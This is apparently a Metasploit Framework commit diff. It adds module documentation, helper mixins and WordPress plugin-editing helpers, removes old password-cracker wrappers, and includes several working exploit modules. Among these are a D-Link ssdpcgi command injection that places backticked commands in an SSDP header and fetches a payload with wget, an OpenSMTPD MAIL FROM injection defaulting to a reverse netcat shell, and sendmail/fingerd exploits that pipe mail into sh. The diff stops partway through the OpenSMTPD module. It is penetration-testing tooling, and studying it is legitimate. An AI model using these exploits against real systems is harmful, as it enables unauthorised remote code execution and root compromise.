+meterpreter > 
+```
@@ -0,0 +1,70 @@
+## Creating A Testing Environment
+
+To use this module you need an administrative Meterpreter or shell session on a Windows 10, 1809 release or higher.
+
+This module has been tested against:
+
+  1. Windows 10, 1903.
+
+This module was not tested against, but may work against:
+
+  1. Windows 10, 1809 and above.
+
+Versions prior to Windows 10 are not supported.
+
+## Module Options
+- **INSTALL_SERVER** - Install OpenSSH.Server for Windows (default: true)
+- **INSTALL_CLIENT** - Install OpenSSH.Client for Windows (default: true)
+- **UNINSTALL_SERVER** - Uninstall OpenSSH.Server for Windows (default: false)
+- **UNINSTALL_CLIENT** - Uninstall OpenSSH.Client for Windows (default: false)
+- **SERVER_VER** - OpenSSH.Server version (default "OpenSSH.Server~~~~0.0.1.0")
+- **CLIENT_VER** - OpenSSH.Client version (default "OpenSSH.Client~~~~0.0.1.0")
+- **AUTOSTART** - Sets sshd service to startup automatically at system boot for persistence (default: true)
+
+### Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a meterpreter or shell session
+  3. Do: `use post/windows/manage/install_ssh`
+  4. Do: `set session #`
+  5. Do: `run`
+  6. Open a new terminal and test SSH access: `ssh user@10.10.10.10`
+
+## Scenarios
+
+### Install OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Installing OpenSSH.Server
+  [*] Installing OpenSSH.Client
+  [*] Post module execution completed
+```
+
+Utilities such as ssh, sftp, and sshfs may be used over the Windows SSH session.
+When combined with capabilities such as SSH forwarding, SSH on Windows can provide pentesters excellent utility and flexibility.
+
+### Uninstall OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > set INSTALL_CLIENT false 
+  INSTALL_CLIENT => false
+  msf5 post(windows/manage/install_ssh) > set INSTALL_SERVER false 
+  INSTALL_SERVER => false
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true 
+  UNINSTALL_CLIENT => true
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_SERVER true 
+  UNINSTALL_SERVER => true
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Uninstalling OpenSSH.Server
+  [*] Uninstalling OpenSSH.Client
+  [*] Post module execution completed
+```
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "5.0.72"
+      VERSION = "5.0.74"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for automatic check (formerly ForceExploit)
+#
+
+module Msf
+module Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options([
+      OptBool.new('AutoCheck', [false, 'Run check before exploitation', true])
+    ])
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      print_warning('AutoCheck is disabled. Proceeding with exploitation.')
+      return
+    end
+
+    print_status('Executing automatic check (disable AutoCheck to override)')
+
+    checkcode = check
+
+    checkcode_error = checkcode.message + '. Disable AutoCheck to override.'
+
+    # This isn't even my final form!
+    case checkcode
+    when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears
+      print_good(checkcode.message)
+    when Exploit::CheckCode::Detected
+      print_warning(checkcode.message)
+    when Exploit::CheckCode::Safe
+      fail_with(Module::Failure::NotVulnerable, checkcode_error)
+    when Exploit::CheckCode::Unsupported
+      fail_with(Module::Failure::BadConfig, checkcode_error)
+    else
+      fail_with(Module::Failure::Unknown, checkcode_error)
+    end
+  end
+
+end
+end
@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for Expect-style interaction
+#
+
+require 'expect'
+
+module Msf::Exploit::Expect
+
+  # Send a line and expect a pattern
+  #
+  # @param line [String] Line to send
+  # @param pattern [Regexp] Pattern to expect
+  # @param sock [Socket] Socket to send/expect on
+  # @param timeout [Float] Seconds to expect pattern
+  # @param newline [String] Newline character(s)
+  # @return [void]
+  def send_expect(line, pattern, sock:, timeout: 3.5, newline: "\n")
+    unless sock.respond_to?(:put) && sock.respond_to?(:expect)
+      raise ArgumentError, 'sock does not appear to be a socket'
+    end
+
+    if line
+      print_status("Sending: #{line}")
+      sock.put("#{line}#{newline}")
+    end
+
+    return unless pattern
+
+    print_status("Expecting: #{pattern.inspect}")
+    sock.expect(pattern, timeout) do |res|
+      unless res
+        raise Timeout::Error, "Pattern not found: #{pattern.inspect}"
+      end
+
+      vprint_good("Received: #{res.first}")
+    end
+  end
+
+end
@@ -40,4 +40,54 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
      return false
    end
  end
+
+  # Edits a plugin file (relative to plugins dir) using a valid admin session.
+  #
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @param contents [String] The plugin file contents to overwrite with
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_edit_plugin(file, contents, cookie)
+    unless (nonce = wordpress_helper_get_plugin_edit_nonce(cookie, file))
+      vprint_error('Failed to acquire the plugin edit nonce')
+      return false
+    end
+
+    vprint_status("Acquired a plugin edit nonce: #{nonce}")
+
+    # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php
+    res = send_request_cgi(
+      'method'       => 'POST',
+      'uri'          => wordpress_url_admin_plugin_editor,
+      'cookie'       => cookie,
+      'vars_post'    => {
+        'action'     => 'update',
+        '_wpnonce'   => nonce,
+        'file'       => file,
+        'newcontent' => contents
+      }
+    )
+
+    unless res && res.redirect?
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    # NOTE: send_request_cgi! doesn't change the method
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => res.redirection.to_s,
+      'cookie' => cookie
+    )
+
+    unless res && res.code == 200 && res.body.include?('edited successfully')
+      vprint_error("Server responded with code #{res.code}") if res
+      vprint_error("Failed to edit plugin file #{file}")
+      return false
+    end
+
+    vprint_status("Edited plugin file #{file}")
+    true
+  end
 end
@@ -139,13 +139,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
  #
  # @param cookie [String] A valid admin session cookie
  # @return [String,nil] The nonce, nil on error
-  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
+  def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, vars_get = nil)
    uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
    options = {
      'method'    => 'GET',
      'uri'       => uri,
      'cookie'    => cookie,
-      'vars_get'  => { 'tab' => 'upload' }
+      'vars_get'  => vars_get || { 'tab' => 'upload' }
    }
    res = send_request_cgi(options)
    if res && res.code == 200
@@ -155,4 +155,40 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
      return wordpress_helper_get_plugin_upload_nonce(cookie, path)
    end
  end
+
+  # Helper method to retrieve a valid plugin edit nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to edit (relative to plugins dir)
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_edit_nonce(cookie, file)
+    wordpress_helper_get_plugin_upload_nonce(
+      cookie,
+      normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'file' => file
+    )
+  end
+
+  # Helper method to retrieve plugin file contents.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @param file [String] The plugin file to retrieve (relative to plugins dir)
+  # @return [String,nil] The contents, nil on error
+  def wordpress_helper_get_plugin_file_contents(cookie, file)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(wordpress_url_backend, 'plugin-editor.php'),
+      'cookie'   => cookie,
+      'vars_get' => {'file' => file}
+    )
+
+    return unless res && res.code == 200
+
+    contents = res.get_html_document.at('//textarea[@name = "newcontent"]')
+
+    return unless contents
+
+    contents.text
+  end
+
 end
@@ -94,6 +94,13 @@ module Msf::Exploit::Remote::HTTP::Wordpress::URIs
    normalize_uri(wordpress_url_backend, 'update.php')
  end

+  # Returns the Wordpress Admin Plugin Editor URL
+  #
+  # @return [String] Wordpress Admin Plugin Editor URL
+  def wordpress_url_admin_plugin_editor
+    normalize_uri(wordpress_url_backend, 'plugin-editor.php')
+  end
+
  # Returns the Wordpress wp-content dir URL
  #
  # @return [String] Wordpress wp-content dir URL
@@ -183,7 +183,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version
      return Msf::Exploit::CheckCode::Detected("Could not identify the version number")
    end

-    vprint_status("Found version #{version} of the #{item_type}")
+    vprint_status("Found version #{version} in the #{item_type}")

    if fixed_version.nil?
      if vuln_introduced_version.nil?
@@ -4,10 +4,12 @@
 #

 # Behavior
+require 'msf/core/exploit/auto_check'
 require 'msf/core/exploit/check_module'
 require 'msf/core/exploit/brute'
 require 'msf/core/exploit/brutetargets'
 require 'msf/core/exploit/browser_autopwn'
+require 'msf/core/exploit/expect'

 # Payload
 require 'msf/core/exploit/egghunter'
@@ -5,7 +5,7 @@ module Msf::Module::Deprecated
  # Additional class methods for deprecated modules
  module ClassMethods
    attr_accessor :deprecation_date
-    attr_accessor :deprecated_name
+    attr_accessor :deprecated_names

    # Mark this module as deprecated
    #
@@ -26,12 +26,11 @@ module Msf::Module::Deprecated

    # Mark this module as moved from another location. This adds an alias to
    # the module so that it can still be used by its old name and will print a
-    # warning informing the use of the new name. This currently only works for
-    # a single move, but it can be extended in the future for multiple moves.
+    # warning informing the use of the new name.
    #
    # @param from [String] the previous `fullname` of the module
    def moved_from(from)
-      self.deprecated_name = from
+      self.deprecated_names << from

      if const_defined?(:Aliases)
        const_get(:Aliases).append from
@@ -42,7 +41,7 @@ module Msf::Module::Deprecated
      # NOTE: aliases are not set until after initialization, so might as well
      # use the block form of alert here too.
      add_warning do
-        if fullname == self.class.deprecated_name
+        if fullname == from
          [ "*%red" + "The module #{fullname} has been moved!".center(88) + "%clr*",
            "*" + "You are using #{realname}".center(88) + "*" ]
        end
@@ -53,5 +52,6 @@ module Msf::Module::Deprecated
  # Extends with {ClassMethods}
  def self.included(base)
    base.extend(ClassMethods)
+    base.deprecated_names = []
  end
 end
@@ -387,7 +387,14 @@ module Msf
              end
            end

-            cached = true if args.empty?
+            if args.empty?
+              if @module_search_results.empty?
+                cmd_search_help
+                return false
+              end
+
+              cached = true
+            end

            # Display the table of matches
            tbl = generate_module_table('Matching Modules', search_term)
@@ -33,7 +33,7 @@ module SocketAbstraction
      _address_family,caddr,_cport = csock.getsockname
      address_family,raddr,_rport = csock.getpeername_as_array
      _maddr,mport = [ channel.params.localhost, channel.params.localport ]
-      [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ]
+      [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", mport ]
    end

    def getpeername
@@ -247,7 +247,7 @@ module Socks5
      setup_tcp_relay
      response              = ResponsePacket.new
      response.command      = REPLY_SUCCEEDED
-      response.address      = @rsock.getlocalname[HOST]
+      response.address      = @rsock.getlocalname[HOST].split('-')[-1]
      response.port         = @rsock.getlocalname[PORT]
      response
    end
@@ -8,10 +8,10 @@ require 'msf/core/auxiliary/password_cracker'
 class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::PasswordCracker
  include Msf::Exploit::Deprecated
-  moved_from 'auxiliary/analyze/jtr_mssql'
-  moved_from 'auxiliary/analyze/jtr_mysql'
-  moved_from 'auxiliary/analyze/jtr_oracle'
-  moved_from 'auxiliary/analyze/jtr_postgres'
+  moved_from 'auxiliary/analyze/jtr_mssql_fast'
+  moved_from 'auxiliary/analyze/jtr_mysql_fast'
+  moved_from 'auxiliary/analyze/jtr_oracle_fast'
+  moved_from 'auxiliary/analyze/jtr_postgres_fast'

  def initialize
    super(
@@ -8,8 +8,7 @@ require 'msf/core/auxiliary/password_cracker'
 class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::PasswordCracker
  include Msf::Exploit::Deprecated
-  moved_from 'auxiliary/analyze/jtr_crack_fast'
-  moved_from 'auxiliary/analyze/jtr_windows'
+  moved_from 'auxiliary/analyze/jtr_windows_fast'

  def initialize
    super(
@@ -1,32 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'            => 'John the Ripper AIX Password Cracker',
-      'Description'     => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from passwd files on AIX systems.
-      },
-      'Author'          =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'         => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_aix')
-  end
-
-end
@@ -1,39 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'            => 'John the Ripper Linux Password Cracker',
-      'Description'     => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from unshadowed passwd files from Unix systems. The module will only crack
-        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack
-        Blowfish and SHA(256/512). Warning: This is much slower.
-      },
-      'Author'          =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'         => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-
-    register_options(
-      [
-        OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
-      ]
-    )
-
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_linux')
-  end
-end
@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'           => 'John the Ripper MS SQL Password Cracker (Fast Mode)',
-      'Description'    => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from the mssql_hashdump module. Passwords that have been successfully
-        cracked are then saved as proper credentials.
-      },
-      'Author'         =>
-        [
-          'theLightCosine',
-          'hdm'
-        ],
-      'License'        => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end
@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'          => 'John the Ripper MySQL Password Cracker (Fast Mode)',
-      'Description'   => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from the mysql_hashdump module. Passwords that have been successfully
-        cracked are then saved as proper credentials.
-      },
-      'Author'         =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'        => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end
@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'           => 'John the Ripper Oracle Password Cracker (Fast Mode)',
-      'Description'    => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from the oracle_hashdump module. Passwords that have been successfully
-        cracked are then saved as proper credentials.
-      },
-      'Author'         =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'        => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end
@@ -1,29 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-        'Name'           => 'John the Ripper Postgres SQL Password Cracker',
-        'Description'    => %Q{
-          This module uses John the Ripper to attempt to crack Postgres password
-          hashes, gathered by the postgres_hashdump module. It is slower than some of the other
-          JtR modules because it has to do some wordlist manipulation to properly handle postgres'
-          format.
-      },
-        'Author'         => ['theLightCosine'],
-        'License'        => MSF_LICENSE
-    )
-
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end
@@ -1,30 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'        => 'John the Ripper Windows Password Cracker (Fast Mode)',
-      'Description' => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
-        of this module is to find trivial passwords in a short amount of time. To
-        crack complex passwords or use large wordlists, John the Ripper should be
-        used outside of Metasploit. This initial version just handles LM/NTLM credentials
-        from hashdump and uses the standard wordlist and rules.
-      },
-      'Author'      => 'hdm',
-      'License'     => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_windows')
-  end
-end
@@ -17,8 +17,11 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'              => 'Morris Worm fingerd Stack Buffer Overflow',
      'Description'       => %q{
        This module exploits a stack buffer overflow in fingerd on 4.3BSD.
+
        This vulnerability was exploited by the Morris worm in 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
+
+        Currently, only bsd/vax/shell_reverse_tcp is supported.
      },
      'Author'            => [
        'Robert Tappan Morris', # Discovery? Exploit and worm for sure
@@ -83,8 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    unless check == CheckCode::Detected || datastore['ForceExploit']
-      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    unless datastore['ForceExploit']
+      unless check == CheckCode::Detected
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
    end

    # Start by generating our custom VAX shellcode
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'expect'
-
 class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

@@ -63,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
-        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
+        OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end
@@ -108,25 +106,24 @@ class MetasploitModule < Msf::Exploit::Local

      begin
        tcp_conversation.each do |line, pattern|
-          Timeout.timeout(datastore['SendExpectTimeout']) do
-            if line
-              if line == 'Received:'
-                for i in (1..31)
-                  socket.puts("#{line} #{i}\n")
-                end
-              else
-                socket.puts("#{line}\n")
+          if line
+            if line == 'Received:'
+              for i in (1..31)
+                socket.puts("#{line} #{i}\n")
              end
+            else
+              socket.puts("#{line}\n")
            end
-            if pattern
-              socket.expect(pattern)
-            end
+          end
+
+          next unless pattern
+
+          unless socket.expect(pattern, datastore['ExpectTimeout'])
+            fail_with(Failure::TimeoutExpired, "Pattern not found: #{pattern.inspect}")
          end
        end
      rescue Rex::ConnectionError => e
        fail_with(Failure::Unreachable, e.message)
-      rescue Timeout::Error
-        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
      ensure
        socket.puts("QUIT\n")
        socket.close
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
+      'Description' => %q{
+        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
+      },
+      'Author'      =>
+        [
+          's1kr10s',
+          'secenv'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2019-20215'],
+          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'wget',
+            'RPORT' => '1900'
+        },
+      'Targets'        =>
+        [
+          [ 'Auto',	{ } ],
+        ],
+      'CmdStagerFlavor' => %w{ echo wget },
+      'DefaultTarget'  => 0
+      ))
+
+  register_options(
+    [
+      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
+    ])
+  end
+
+  def exploit
+    execute_cmdstager(linemax: 1500)
+  end
+
+  def execute_command(cmd, opts)
+    type = datastore['VECTOR']
+    if type == "URN"
+      print_status("Target Payload URN")
+      val = "urn:device:1;`#{cmd}`"
+    else
+      print_status("Target Payload UUID")
+      val = "uuid:`#{cmd}`"
+    end
+
+    connect_udp
+    header = "M-SEARCH * HTTP/1.1\r\n"
+    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
+    header << "ST:#{val}\r\n"
+    header << "Man:\"ssdp:discover\"\r\n"
+    header << "MX:2\r\n\r\n"
+    udp_sock.put(header)
+    disconnect_udp
+  end
+end
@@ -15,6 +15,7 @@ class MetasploitModule < Msf::Exploit::Local
      'Description'    => %q{
        This module exploits a SUID installation of the Emacs movemail utility
        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
+
        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
      },
      'Author'         => [
@@ -133,8 +134,10 @@ class MetasploitModule < Msf::Exploit::Local
      return cmd_exec(payload.encoded)
    end

-    unless check == CheckCode::Appears || datastore['ForceExploit']
-      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    unless datastore['ForceExploit']
+      unless check == CheckCode::Appears
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
    end

    # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
@@ -3,14 +3,13 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'expect'
-
 class MetasploitModule < Msf::Exploit::Remote

  # cmd/unix/reverse spams the session with Telnet codes on EOF
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Expect

  def initialize(info = {})
    super(update_info(info,
@@ -22,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
        This vulnerability was exploited by the Morris worm in 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

-        Currently only cmd/unix/reverse and cmd/unix/generic are supported.
+        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.
      },
      'Author'         => [
        'Robert Tappan Morris', # Exploit and worm for sure
@@ -52,8 +51,8 @@ class MetasploitModule < Msf::Exploit::Remote
    register_options([Opt::RPORT(25)])

    register_advanced_options([
-      OptBool.new('ForceExploit',       [false, 'Override check result', false]),
-      OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
+      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

@@ -87,14 +86,16 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    unless check == CheckCode::Appears || datastore['ForceExploit']
-      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    unless datastore['ForceExploit']
+      unless check == CheckCode::Appears
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
    end

    # We don't care who the user is, so randomize it
    from = rand_text_alphanumeric(8..42)

-    # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
+    # Strip mail headers with sed(1), pass to sh(1), and ensure a clean exit
    to = %("| sed '1,/^$/d' | sh; exit 0")

    # We don't have $PATH, so set one
@@ -105,8 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
      'DEBUG'               => /200 Debug set/,
      "MAIL FROM:<#{from}>" => /250.*Sender ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
-      'DATA'                => /354 Enter mail/,
-      # Indent PATH= so it's not interpreted as part of the mail header
+      'DATA'                => /354 Enter mail.*itself/,
+      # Indent PATH= so it's not interpreted as a mail header
      " PATH=#{path}"       => nil,
      'export PATH'         => nil,
      payload.encoded       => nil,
@@ -119,24 +120,18 @@ class MetasploitModule < Msf::Exploit::Remote

    print_status('Enabling debug mode and sending exploit')
    sploit.each do |line, pattern|
-      Timeout.timeout(datastore['SendExpectTimeout']) do
-        if line
-          print_status("Sending: #{line}")
-          sock.put("#{line}\r\n")
-        end
-        if pattern
-          vprint_status("Expecting: #{pattern.inspect}")
-          sock.expect(pattern) do |pat|
-            return unless pat
-            vprint_good("Received: #{pat.first}")
-          end
-        end
-      end
+      send_expect(
+        line,
+        pattern,
+        sock:    sock,
+        timeout: datastore['ExpectTimeout'],
+        newline: "\r\n"
+      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
-  rescue Timeout::Error
-    fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Expect
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a command injection in the MAIL FROM field during
+        SMTP interaction with OpenSMTPD to execute code as the root user.
+      },
+      'Author'         => [
+        'Qualys',                               # Discovery and PoC
+        'wvu',                                  # Module
+        'RageLtMan <rageltman[at]sempervictus>' # Module
+      ],
+      'References'     => [
+        ['CVE', '2020-7247'],
+        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
+      ],
+      'DisclosureDate' => '2020-01-28',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
+      'Targets'        => [
+        ['OpenSMTPD >= commit a8e222352f',
+          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
+    ))
+
+    register_options([
+      Opt::RPORT(25),
+      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
+    ])
+  end
+
+  def check
+    connect
+    res = sock.get_once
+
+    return CheckCode::Unknown unless res
+    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
+
+    CheckCode::Safe
+  rescue EOFError, Rex::ConnectionError => e
+    vprint_error(e.message)
+    CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      unless check == CheckCode::Detected
+        fail_with(Failure::Unknown, 'Set ForceExploit to override')
+      end
+    end
+
+    # We don't care who we are, so randomize it
+    me = rand_text_alphanumeric(8..42)
+
+    # Send mail to this valid recipient
+    to = datastore['RCPT_TO']
+
+    # Comment "slide" courtesy of Qualys - brilliant!
+    iter = rand_text_alphanumeric(15).chars.join(' ')
+    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
+
+    # This is just insurance, since the code was already written
+    if from.length > 64
+      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
+    elsif (badchars = (from.chars & target['MyBadChars'])).any?
+      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
+    end
+
